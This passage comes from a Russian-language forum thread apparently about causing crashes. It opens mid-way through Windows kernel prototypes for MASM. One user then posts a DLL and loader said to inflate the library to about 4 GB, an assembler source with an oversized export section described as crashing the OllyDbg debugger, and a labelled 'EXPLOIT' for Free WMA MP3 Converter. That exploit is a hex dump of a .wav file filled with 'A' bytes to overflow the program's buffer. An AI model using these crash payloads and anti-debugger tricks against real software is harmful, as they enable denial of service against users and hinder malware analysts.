mov [ecx].SecurityDesсriрtor, r
ENDIF
ENDIF
and [ecx].SecurityQualityOfService, 0
assume ecx:nothing
POPCONTEXT ASSUMES
ENDM
ntoskrnl.inc
ZwYieldExecution PROTO STDCALL
ZwWriteFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwWaitForSingleObject PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwWaitForMultipleObjects PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwUnmapViewOfSection PROTO STDCALL :DWORD, :DWORD
ZwUnloadKey PROTO STDCALL :DWORD
ZwUnloadDriver PROTO STDCALL :DWORD
ZwTerminateProcess PROTO STDCALL :DWORD, :DWORD
ZwSetVolumeInformationFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetValueKey PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetTimer PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetSystemTime PROTO STDCALL :DWORD, :DWORD
ZwSetSystemInformation PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwSetSecurityObject PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwSetInformationThread PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetInformationProcess PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetInformationObject PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetInformationFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetEvent PROTO STDCALL :DWORD, :DWORD
ZwSetEaFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetDefaultUILanguage PROTO STDCALL :DWORD
ZwSetDefaultLocale PROTO STDCALL :DWORD, :DWORD
ZwSaveKey PROTO STDCALL :DWORD, :DWORD
ZwRestoreKey PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwResetEvent PROTO STDCALL :DWORD, :DWORD
ZwRequestWaitReplyPort PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwReplaceKey PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwReadFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryVolumeInformationFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryValueKey PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQuerySystemInformation PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwQuerySymbolicLinkObject PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwQuerySecurityObject PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQuerySection PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryObject PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryKey PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryInstallUILanguage PROTO STDCALL :DWORD
ZwQueryInformationToken PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryInformationProcess PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryInformationFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryEaFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryDirectoryObject PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryDirectoryFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryDefaultUILanguage PROTO STDCALL :DWORD
ZwQueryDefaultLocale PROTO STDCALL :DWORD, :DWORD
ZwPulseEvent PROTO STDCALL :DWORD, :DWORD
ZwPowerInformation PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenTimer PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenThreadToken PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenThread PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenSymbolicLinkObject PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenSection PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenProcessToken PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenProcess PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenKey PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenEvent PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenDirectoryObject PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwNotifyChangeKey PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwMapViewOfSection PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwMakeTemporaryObject PROTO STDCALL :DWORD
ZwLoadKey PROTO STDCALL :DWORD, :DWORD
ZwLoadDriver PROTO STDCALL :DWORD
ZwInitiatePowerAction PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwFsControlFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwFreeVirtualMemory PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwFlushVirtualMemory PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwFlushKey PROTO STDCALL :DWORD
ZwFlushInstructionCache PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwEnumerateValueKey PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwEnumerateKey PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDuplicateToken PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDuplicateObject PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDisplayString PROTO STDCALL :DWORD
ZwDeviceIoControlFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDeleteValueKey PROTO STDCALL :DWORD, :DWORD
ZwDeleteKey PROTO STDCALL :DWORD
ZwDeleteFile PROTO STDCALL :DWORD
ZwCreateTimer PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateSymbolicLinkObject PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateSection PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateKey PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateFile PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateEvent PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateDirectoryObject PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwConnectPort PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCloseObjectAuditAlarm PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwClose PROTO STDCALL :DWORD
ZwClearEvent PROTO STDCALL :DWORD
ZwCancelTimer PROTO STDCALL :DWORD, :DWORD
ZwCancelIoFile PROTO STDCALL :DWORD, :DWORD
ZwAllocateVirtualMemory PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwAlertThread PROTO STDCALL :DWORD
ZwAdjustPrivilegesToken PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwAccessCheckAndAuditAlarm PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
WRITE_REGISTER_USHORT PROTO STDCALL :DWORD, :DWORD
WRITE_REGISTER_ULONG PROTO STDCALL :DWORD, :DWORD
WRITE_REGISTER_UCHAR PROTO STDCALL :DWORD, :DWORD
WRITE_REGISTER_BUFFER_USHORT PROTO STDCALL :DWORD, :DWORD, :DWORD
WRITE_REGISTER_BUFFER_ULONG PROTO STDCALL :DWORD, :DWORD, :DWORD
WRITE_REGISTER_BUFFER_UCHAR PROTO STDCALL :DWORD, :DWORD, :DWORD
SeValidSecurityDesсriрtor PROTO STDCALL :DWORD, :DWORD
SeUnregisterLogonSession
|
|
|
|
|
RE: BSOD - 2012-02-12 00:38:55.863333
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
BONUS:
dynamic.dll - динамическая библиотека,созданная при помощи LCC-Win32 Free Compiler(a)
В сочетании с LoadLibraryA при первом запуске сжимается c 12Kb до 4kb,а при втором библа расширяется до 3,99 Гб
111.c
/* --- The following code comes from C:\lcc\lib\wizard\dll.tpl. */
#include <windows.h>
/*------------------------------------------------------------------------
Procedure: LibMain ID:1
Purpose: Dll entry point.Called when a dll is loaded or
unloaded by a process, and when new threads are
created or destroyed.
Input: hDllInst: Instance handle of the dll
fdwReason: event: attach/detach
lpvReserved: not used
Output: The return value is used only when the fdwReason is
DLL_PROCESS_ATTACH. True means that the dll has
sucesfully loaded, False means that the dll is unable
to initialize and should be unloaded immediately.
Errors:
------------------------------------------------------------------------*/
BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
// The DLL is being loaded for the first time by a given process.
// Perform per-process initialization here. If the initialization
// is successful, return TRUE; if unsuccessful, return FALSE.
break;
case DLL_PROCESS_DETACH:
// The DLL is being unloaded by a given process. Do any
// per-process clean up here, such as undoing what was done in
// DLL_PROCESS_ATTACH. The return value is ignored.
break;
case DLL_THREAD_ATTACH:
// A thread is being created in a process that has already loaded
// this DLL. Perform any per-thread initialization here. The
// return value is ignored.
break;
case DLL_THREAD_DETACH:
// A thread is exiting cleanly in a process that has already
// loaded this DLL. Perform any per-thread clean up here. The
// return value is ignored.
break;
}
return TRUE;
}
111.prj
; Wedit project file. Syntax: Name = value
[111]
PrjFiles=1
File1=111.c
ProjectFlags=0
Frame=114 110 956 728
StatusBar=0,0,0,0
Name=111
CurrentFile=
OpenFiles=0
ProjectPath=C:\lcc\src\1
SourcesDir=C:\lcc\src\1
Defines=
IncludeFilesCount=1
IncludeFile0=C:\lcc\include
Libraries=
LinkerArgs=
ProjectTime=258
MakeName=C:\lcc\bin\make.exe
MakeDir=C:\lcc\src\1\lcc
Exe=c:\lcc\src\1\lcc\111.dll
DebuggerArguments=
DbgExeName=c:\lcc\src\1\lcc\111.dll
DbgDir=c:\lcc\src\1\lcc
CompilerFlags=264
Useframework=0
NumberOfBreakpoints=0
ErrorFile=C:\lcc\src\1\lcc\111.err
NrOfFileProcessors=0
+LoadLibraryA+.asm
.386
.model flat, stdcall
option casemap :none
include C:\MASM32\INCLUDE\windows.inc
include C:\MASM32\INCLUDE\user32.inc
include C:\MASM32\INCLUDE\kernel32.inc
includelib C:\MASM32\LIB\kernel32.lib
includelib C:\MASM32\LIB\user32.lib
.data
szMBText db " Hallo ASM !!!",0
szMBHead db " My Program",0
lib db "111.dll",0
.code
start:
mov esi,offset lib
push esi
call LoadLibraryA
push eax
call FreeLibrary
push 0
push esi
call BeginUpdateResourceA
push 0
push eax
call EndUpdateResourceA
test eax, eax
invoke MessageBox,NULL,ADDR szMBText,ADDR szMBHead,MB_OK
invoke ExitProcess,0
end start
|
|
|
|
|
RE: BSOD - 2012-02-12 00:40:27.246666
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
+EXPORT+.ASM OllyDbg bufferoverflow
Исходник добавляющий секцию экспорта в программу.Сносит OllyDbg без плагинов.
(Dbg crash)
format PE GUI 4.0
include 'c:\fasm\include\win32ax.inc'
section '.text' data readable executable
start:
invoke MessageBox,HWND_DESKTOP," Hallo FASM !!!"," Win32 Assembly",MB_OK,
invoke ExitProcess,0
.end start
section '.data' export data readable
export '*.dll',\
$, 1024h dup ('.')
|
|
|
|
|
RE: BSOD - 2012-02-12 00:47:40.350000
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
NEW Free WMA MP3 Converter_EXPLOIT:
Ваш,старый,подправленный.wav :
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000210 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000220 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000230 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000240 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000250 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000290 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000300 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000310 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000320 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000330 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000350 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000360 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000370 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000003A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000003B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000003C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000003D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000003E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000003F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000400 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000410 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000420 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000430 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000440 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000460 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000470 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000480 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000490 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000004A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000004B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000004C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000004D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000004E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000004F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000500 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000510 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000520 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000530 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000540 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000550 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000560 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000570 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000580 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000590 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000005A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000005B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000005C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000005D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000005E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000005F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000600 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000610 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000620 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000630 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000640 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000650 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000660 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000670 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000680 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000690 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000006A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000006B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000006C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000006D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000006E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000006F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000700 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000710 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000720 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000730 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000740 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000750 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000760 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000770 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000780 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000790 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000007A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000007B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000007C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000007D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000007E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000007F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000800 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000810 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000820 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000830 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000840 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000850 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000860 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000870 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000880 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000890 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000008A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000008B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000008C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000008D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000008E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000008F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000900 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000910 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000920 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000930 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000940 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000950 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000960 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000970 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000980 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000990 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000009A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
